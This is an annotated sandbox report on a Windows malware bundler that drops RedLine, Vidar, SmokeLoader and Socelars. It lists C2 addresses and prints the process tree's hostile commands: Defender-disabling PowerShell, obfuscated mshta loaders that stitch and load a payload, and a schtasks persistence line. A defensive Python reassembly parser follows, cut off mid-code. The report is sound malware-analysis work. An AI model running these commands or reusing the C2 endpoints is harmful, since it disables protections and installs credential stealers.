Analysis
- max time kernel: 39s
- max time network: 151s
- platform: windows7_x64
- resource: win7-en-20211104
- submitted: 19/11/2021, 18:12
- Static task: static1
- Behavioral task: behavioral1
- Sample: ab0bd8932a92421272b5911e2ebf488b.exe
- Resource: win7-en-20211104
General
- Target: ab0bd8932a92421272b5911e2ebf488b.exe
- Size: 9.7MB
- MD5: ab0bd8932a92421272b5911e2ebf488b
- SHA1: 8fc75411fae94208b303c30faf3f4ba7385f8e22
- SHA256: 61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
- SHA512: 587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9
Malware Config
Four family configurations were extracted from this one sample; the installer is a bundler that drops several independent payloads.

Extracted: socelars
- C2: http://www.gianninidesign.com/

Extracted: smokeloader
- Version: 2020
- C2:
  - http://membro.at/upload/
  - http://jeevanpunetha.com/upload/
  - http://misipu.cn/upload/
  - http://zavodooo.ru/upload/
  - http://targiko.ru/upload/
  - http://vues3d.com/upload/

Extracted: redline
- Botnet: media151
- C2: 91.121.67.60:51630

Extracted: vidar
- Version: 48.3
- Botnet: 933
- Attributes: profile_id 933
Signatures

Process spawned unexpected child process (2 IoCs)
The sandbox's generic note is that this typically indicates the parent process was compromised via an exploit or macro. Here the parent is C:\Windows\system32\wbem\wmiprvse.exe. The WMI provider host is the parent of every process created through WMI (Win32_Process.Create), so the likelier reading is that one of the payloads used WMI to launch rundll32.exe with the dropped sqlite.dll (see the Processes list), not that wmiprvse.exe itself was exploited.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2228 | 2536 | rundll32.exe | 75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2564 | 2536 | rundll32.exe | 75
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (5 IoCs)
All five hits are memory dumps of PID 2272, the second Mon13bb1ac8986b773.exe child whose parent (PID 1264) targeted it with SetThreadContext (see below). That is consistent with process hollowing (RunPE): the RedLine payload runs inside a replaced copy of its own dropper's image rather than from a file on disk.
resource | yara_rule
behavioral1/memory/2272-241-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2272-242-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2272-243-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2272-244-0x0000000000418EFA-mapping.dmp | family_redline
behavioral1/memory/2272-246-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (1 IoCs)
resource | yara_rule
behavioral1/files/0x000500000001306d-143.dat | family_socelars

Vidar Stealer (2 IoCs)
Both hits are memory dumps of PID 1620, Worldoffer.exe, which later crashed (WerFault PID 2468, see Program crash below).
resource | yara_rule
behavioral1/memory/1620-316-0x0000000000400000-0x00000000004D8000-memory.dmp | family_vidar
behavioral1/memory/1620-317-0x0000000001EC0000-0x0000000001F95000-memory.dmp | family_vidar

ASPack-packed dropped files (6 IoCs)
Three dropped files match the aspack_v212_v242 packer rule; each file is reported twice under consecutive resource numbers.
resource | yara_rule
behavioral1/files/0x000500000001262d-71.dat | aspack_v212_v242
behavioral1/files/0x000500000001262d-72.dat | aspack_v212_v242
behavioral1/files/0x0005000000012625-73.dat | aspack_v212_v242
behavioral1/files/0x0005000000012625-74.dat | aspack_v212_v242
behavioral1/files/0x000500000001264b-77.dat | aspack_v212_v242
behavioral1/files/0x000500000001264b-78.dat | aspack_v212_v242
Executes dropped EXE (19 IoCs)
PIDs are reused within the run (684 and 752 each appear below for two different images), so correlate on image name and parent rather than on PID alone.
pid | Process
364 | setup_installer.exe
924 | setup_install.exe
928 | Mon135d1cd0566c227c.exe
1460 | Mon133b4073df5e3f72.exe
888 | Mon13459b4085.exe
1332 | Mon1348816450.exe
1504 | Mon13136643d24e51.exe
684 | Mon13073304e5395.exe
752 | Mon13470f9aa951f871.exe
1448 | Mon134ab4d3e88a4d3e.exe
2004 | Mon13470f9aa951f871.exe
1264 | Mon13bb1ac8986b773.exe
1912 | Mon13073304e5395.tmp
752 | Mon13be6b39578.exe
1576 | Mon13073304e5395.exe
240 | Mon13073304e5395.tmp
2168 | Mon13bb1ac8986b773.exe
2308 | 3SEL8GaJ5WrN1.EXe
2272 | Mon13bb1ac8986b773.exe

Loads dropped DLL (64 IoCs; the list stops at the report's 64-entry cap)
Consecutive repeats are collapsed into a count; order is as reported.
pid | Process | loads
684 | ab0bd8932a92421272b5911e2ebf488b.exe | 1
364 | setup_installer.exe | 6
924 | setup_install.exe | 8
976 | cmd.exe | 1
1376 | cmd.exe | 1
1752 | cmd.exe | 1
1460 | Mon133b4073df5e3f72.exe | 2
888 | Mon13459b4085.exe | 2
1740 | cmd.exe | 1
1012 | cmd.exe | 1
1976 | cmd.exe | 1
1504 | Mon13136643d24e51.exe | 2
304 | cmd.exe | 2
684 | Mon13073304e5395.exe | 2
1720 | cmd.exe | 2
752 | Mon13470f9aa951f871.exe | 3
1448 | Mon134ab4d3e88a4d3e.exe | 2
2004 | Mon13470f9aa951f871.exe | 2
1244 | cmd.exe | 2
1264 | Mon13bb1ac8986b773.exe | 2
684 | Mon13073304e5395.exe | 1
912 | cmd.exe | 1
1912 | Mon13073304e5395.tmp | 4
752 | Mon13be6b39578.exe | 2
1576 | Mon13073304e5395.exe | 3
240 | Mon13073304e5395.tmp | 3
1264 | Mon13bb1ac8986b773.exe | 1
2116 | WerFault.exe | 3
1264 | Mon13bb1ac8986b773.exe | 1
2116 | WerFault.exe | 1
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
8 | ip-api.com
Suspicious use of SetThreadContext (2 IoCs)
In both cases the parent sets the thread context of a freshly spawned copy of its own image (PID 752 -> 2004, PID 1264 -> 2272). That is the footprint of process hollowing (RunPE), where the child is typically created suspended, its image replaced in memory and its entry point redirected through SetThreadContext. PID 2004 went on to crash (see Program crash); PID 2272 is where all the RedLine YARA hits are.
description | pid | Process | procid_target
PID 752 set thread context of 2004 | 752 | Mon13470f9aa951f871.exe | 55
PID 1264 set thread context of 2272 | 1264 | Mon13bb1ac8986b773.exe | 69
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but no ransomware family and no file-encryption activity is reported for this sample; stealers and loaders also enumerate drives, so read it as drive enumeration rather than as evidence of encryption here.
Program crash (2 IoCs)
pid | pid_target | Process | procid_target
2116 | 2004 | WerFault.exe | 55
2468 | 1620 | WerFault.exe | 93
PID 2004 is the hollowed Mon13470f9aa951f871.exe child; PID 1620 is Worldoffer.exe, whose memory carries the Vidar hits. A crash in the sandbox does not mean the payload failed on a real victim, so treat both configs as live.
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Mon134ab4d3e88a4d3e.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Mon134ab4d3e88a4d3e.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Mon134ab4d3e88a4d3e.exe
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2412 | schtasks.exe

Kills process with taskkill (2 IoCs)
pid | Process
2320 | taskkill.exe
2640 | taskkill.exe
Suspicious behavior: EnumeratesProcesses (49 IoCs)
Repeated entries are collapsed into a count.
pid | Process | count
752 | Mon13be6b39578.exe | 1
1448 | Mon134ab4d3e88a4d3e.exe | 2
2116 | WerFault.exe | 7
1208 | Process not Found | 37
852 | powershell.exe | 1
1724 | powershell.exe | 1
Suspicious behavior: MapViewOfSection (1 IoCs)
pid | Process
1448 | Mon134ab4d3e88a4d3e.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 888 | Mon13459b4085.exe
Token: SeDebugPrivilege | 2116 | WerFault.exe
Token: SeDebugPrivilege | 852 | powershell.exe
Token: SeDebugPrivilege | 1724 | powershell.exe
Token: SeShutdownPrivilege | 1208 | Process not Found
Token: SeDebugPrivilege | 2320 | taskkill.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
1208 | Process not Found
1208 | Process not Found
PID 1208 is never resolved to an image anywhere in this report, and FindShellTrayWindow plus SeShutdownPrivilege are also used by ordinary desktop components, so do not attribute the PID 1208 entries to the sample without an image path or process GUID.
Suspicious use of WriteProcessMemory (64 IoCs; the list stops at the report's 64-entry cap, after setup_install.exe's child with procid 38)
Repeated entries are collapsed into a count.
description | pid | Process | procid_target | count
PID 684 wrote to memory of 364 | 684 | ab0bd8932a92421272b5911e2ebf488b.exe | 28 | 7
PID 364 wrote to memory of 924 | 364 | setup_installer.exe | 29 | 7
PID 924 wrote to memory of 1292 | 924 | setup_install.exe | 31 | 7
PID 924 wrote to memory of 1256 | 924 | setup_install.exe | 32 | 7
PID 924 wrote to memory of 1376 | 924 | setup_install.exe | 33 | 7
PID 924 wrote to memory of 976 | 924 | setup_install.exe | 34 | 7
PID 924 wrote to memory of 1864 | 924 | setup_install.exe | 35 | 7
PID 924 wrote to memory of 1740 | 924 | setup_install.exe | 36 | 7
PID 924 wrote to memory of 1752 | 924 | setup_install.exe | 37 | 7
PID 924 wrote to memory of 1012 | 924 | setup_install.exe | 38 | 1
Every target here is a child the writer itself just created, with a uniform count per child, which fits process start-up by the installer chain rather than injection into an unrelated process; the genuine injection in this run is under SetThreadContext above.
Processes
Indented by depth; [n] is the depth shown in the report, "cmd:" is the command line as captured, and the bullets are the signatures attributed to that process.

[1] C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe (PID 684)
    cmd: "C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (PID 364)
      cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe (PID 924)
        cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1292)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 852)
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1256)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1724)
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      These two PowerShell invocations are the first children of setup_install.exe: they switch off Defender real-time monitoring, cloud (MAPS) reporting and sample submission, then exclude the drop directory from scanning, before any payload is launched. The report has no dedicated signature for this, so it is easy to miss when reading the signature list alone.
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1376)
          cmd: C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe (PID 928)
            cmd: Mon135d1cd0566c227c.exe
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (PID 2096)
              cmd: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe (PID 1556)
                cmd: "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
              [8] C:\Users\Admin\AppData\Roaming\5592368.exe (PID 1292)
                  cmd: "C:\Users\Admin\AppData\Roaming\5592368.exe"
              [8] C:\Users\Admin\AppData\Roaming\8164961.exe (PID 3000)
                  cmd: "C:\Users\Admin\AppData\Roaming\8164961.exe"
                [9] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe (PID 880)
                    cmd: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
              [8] C:\Users\Admin\AppData\Roaming\5579078.exe (PID 992)
                  cmd: "C:\Users\Admin\AppData\Roaming\5579078.exe"
              [8] C:\Users\Admin\AppData\Roaming\7804314.exe (PID 2920)
                  cmd: "C:\Users\Admin\AppData\Roaming\7804314.exe"
                [9] C:\Users\Admin\AppData\Roaming\7935225.exe (PID 2236)
                    cmd: "C:\Users\Admin\AppData\Roaming\7935225.exe"
                  [10] C:\Windows\SysWOW64\mshta.exe (PID 2908)
                       cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 3068)
                         cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\7935225.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\7935225.exe" ) do taskkill -IM "%~NxL" -F
                      [12] C:\Windows\SysWOW64\taskkill.exe (PID 2640)
                           cmd: taskkill -IM "7935225.exe" -F
                           - Kills process with taskkill
                      [12] C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe (PID 1992)
                           cmd: ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM
                        [13] C:\Windows\SysWOW64\mshta.exe (PID 2760)
                             cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                          [14] C:\Windows\SysWOW64\cmd.exe (PID 2768)
                               cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F
                        [13] C:\Windows\SysWOW64\mshta.exe (PID 2224)
                             cmd: "C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))
                          [14] C:\Windows\SysWOW64\cmd.exe (PID 2764)
                               cmd: "C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly
                            [15] C:\Windows\SysWOW64\cmd.exe (PID 3040)
                                 cmd: C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"
                            [15] C:\Windows\SysWOW64\cmd.exe (PID 2676)
                                 cmd: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                            [15] C:\Windows\SysWOW64\msiexec.exe (PID 2508)
                                 cmd: msiexec.exe -Y ..\VYGDVP.ly
                  The 7935225.exe branch is a two-hop loader. Hop one (PID 2908/3068) copies the binary to a random name, relaunches it with a /P... argument and kills the original; the iF "" =="" test is true only when the binary was started without that argument, so the taskkill runs only on the first hop. Hop two (PID 2224/2764) writes the two bytes MZ with echo | set /p, appends the dropped fragments with copy /b into ..\VYGDVP.ly (the fragments were dropped without a PE header so they do not look like executables), deletes the fragments, and loads the result with msiexec -Y, which treats its argument as a DLL and calls DllRegisterServer.
                [9] C:\Users\Admin\AppData\Roaming\1992774.exe (PID 112)
                    cmd: "C:\Users\Admin\AppData\Roaming\1992774.exe"
              [8] C:\Users\Admin\AppData\Roaming\6803894.exe (PID 1284)
                  cmd: "C:\Users\Admin\AppData\Roaming\6803894.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe (PID 1620)
                cmd: "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
              [8] C:\Windows\SysWOW64\WerFault.exe (PID 2468)
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 968
                  - Program crash
            [7] C:\Users\Admin\AppData\Local\Temp\inst1.exe (PID 560)
                cmd: "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\chrome1.exe (PID 2528)
                cmd: "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\chrome update.exe (PID 2404)
                cmd: "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\setup.exe (PID 1284)
                cmd: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe (PID 2416)
                cmd: "C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe (PID 2212)
                cmd: "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\chrome2.exe (PID 2132)
                cmd: "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\chrome3.exe (PID 2868)
                cmd: "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\Chrome5.exe (PID 1500)
                cmd: "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
              [8] C:\Windows\System32\conhost.exe (PID 2300)
                  cmd: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                [9] C:\Windows\System32\cmd.exe (PID 1488)
                    cmd: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                  [10] C:\Windows\system32\schtasks.exe (PID 2412)
                       cmd: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                       - Creates scheduled task(s)
                [9] C:\Windows\System32\cmd.exe (PID 1612)
                    cmd: "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                  [10] C:\Users\Admin\AppData\Roaming\services64.exe (PID 2804)
                       cmd: C:\Users\Admin\AppData\Roaming\services64.exe
              The Chrome5.exe branch is the only persistence in the run: a logon task named "services64" with /rl highest pointing at %AppData%\services64.exe, which it then starts immediately.
      [4] C:\Windows\SysWOW64\cmd.exe (PID 976)
          cmd: C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe (PID 1460)
            cmd: Mon133b4073df5e3f72.exe
            - Executes dropped EXE
            - Loads dropped DLL
          [6] C:\Windows\SysWOW64\mshta.exe (PID 2040)
              cmd: "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )
            [7] C:\Windows\SysWOW64\cmd.exe (PID 2208)
                cmd: "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"
              [8] C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe (PID 2308)
                  cmd: 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9
                  - Executes dropped EXE
                [9] C:\Windows\SysWOW64\mshta.exe (PID 2364)
                    cmd: "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )
                  [10] C:\Windows\SysWOW64\cmd.exe (PID 2504)
                       cmd: "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"
                [9] C:\Windows\SysWOW64\mshta.exe (PID 2600)
                    cmd: "C:\Windows\System32\mshta.exe" vbscript:ClOse( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )
                  [10] C:\Windows\SysWOW64\cmd.exe (PID 2660)
                       cmd: "C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq &cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ+ M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 2696)
                         cmd: C:\Windows\system32\cmd.exe /S /D /c" EChO "
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 2708)
                         cmd: C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"
                    [11] C:\Windows\SysWOW64\control.exe (PID 2736)
                         cmd: control.exe .\PcAKEO.F
                      [12] C:\Windows\SysWOW64\rundll32.exe (PID 2776)
                           cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F
                        [13] C:\Windows\system32\RunDll32.exe (PID 3008)
                             cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F
                          [14] C:\Windows\SysWOW64\rundll32.exe (PID 3020)
                               cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F
              [8] C:\Windows\SysWOW64\taskkill.exe (PID 2320)
                  cmd: taskkill /f -im "Mon133b4073df5e3f72.exe"
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
          The Mon133b4073df5e3f72.exe branch is the same two-hop loader as 7935225.exe above, with type instead of copy for the self-copy and control.exe instead of msiexec as the final loader: control.exe hands any file it is given to Shell32!Control_RunDLL, which loads it as a Control Panel applet DLL, which is why the stitched file pcAKEo.F ends up inside a 32-bit rundll32.exe (PID 3020) calling shell32.dll export #44.
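The two stitching stages above (PID 2764 under the 7935225.exe branch and PID 2660 under the Mon133b4073df5e3f72.exe branch) share one template: write "MZ" with echo | set /p, append the header-less fragments with copy /b, optionally delete the fragments, then start a LOLBin on the result. The parser below recovers the fragment order, the output name and the loader from such a command line, and simulates the copy so an analyst can reassemble the payload from dropped files. It is an added example, not code from the report or the malware: the regexes, the dict layout, the executor table and the fragment bytes are assumptions, and the fragment contents are constructed (the real fragments are not on the page).

```python
import re
from typing import Dict, List


def _tokens(segment: str) -> List[str]:
    # Pad '+' with spaces so "a+ b +c" splits cleanly into names and separators.
    return segment.replace("+", " + ").split()


def parse_stitch_chain(cmdline: str) -> Dict[str, object]:
    """Recover header bytes, fragment order, output name and the LOLBin used."""
    info: Dict[str, object] = {
        "header_bytes": b"", "header_file": "", "sources": [],
        "destination": "", "deletes_fragments": False,
        "executor": "", "executor_args": "",
    }
    # 'set /p' prints its prompt with no trailing newline; redirected to a
    # file, that yields the bare PE signature the fragments were stripped of.
    m = re.search(r'(?i)set\s+/p\s*=\s*"([^"]*)"\s*>\s*([^\s&]+)', cmdline)
    if m:
        info["header_bytes"] = m.group(1).encode("ascii")
        info["header_file"] = m.group(2)
    # Stages are chained with a single '&'; split on it and dispatch on the verb.
    for seg in (s.strip() for s in cmdline.split("&") if s.strip()):
        toks = _tokens(seg)
        verb = toks[0].lower()
        if verb == "copy":
            operands = [t for t in toks[1:] if not t.startswith("/")]  # drop /b /y
            info["destination"] = operands[-1]
            info["sources"] = [t for t in operands[:-1] if t != "+"]
        elif verb == "del":
            info["deletes_fragments"] = True
        elif verb == "start":
            info["executor"] = toks[1].lower()
            info["executor_args"] = " ".join(toks[2:])
    return info


def reassemble(info: Dict[str, object], files: Dict[str, bytes]) -> bytes:
    """Simulate 'copy /b' over the parsed chain. Names are matched case-
    insensitively, as NTFS does; that is why the chain can spell TiSQ.G as TisQ.G."""
    lookup = {name.lower(): data for name, data in files.items()}
    lookup[str(info["header_file"]).lower()] = bytes(info["header_bytes"])
    return b"".join(lookup[str(name).lower()] for name in info["sources"])


def looks_like_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


# What each LOLBin seen in the tree does with the stitched file (assumed table).
EXECUTOR_ENTRYPOINT = {
    "msiexec.exe": "loads the file as a DLL and calls DllRegisterServer (/y, written -Y here)",
    "control.exe": "hands the file to Shell32!Control_RunDLL, which loads it and calls CPlApplet",
}

# Constructed input: the two cmd.exe command lines from the process tree above.
CHAIN_MSIEXEC = (r'"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b '
                 r'TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly')
CHAIN_CONTROL = (r'"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq &cOPy /B /y XLaE8u7.rQ + '
                 r'UnS0AW.LjZ+ M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F')

# Constructed fragment contents: a DOS header with its first two bytes removed,
# split across the three fragment names used by CHAIN_MSIEXEC.
FRAGMENTS_MSIEXEC = {
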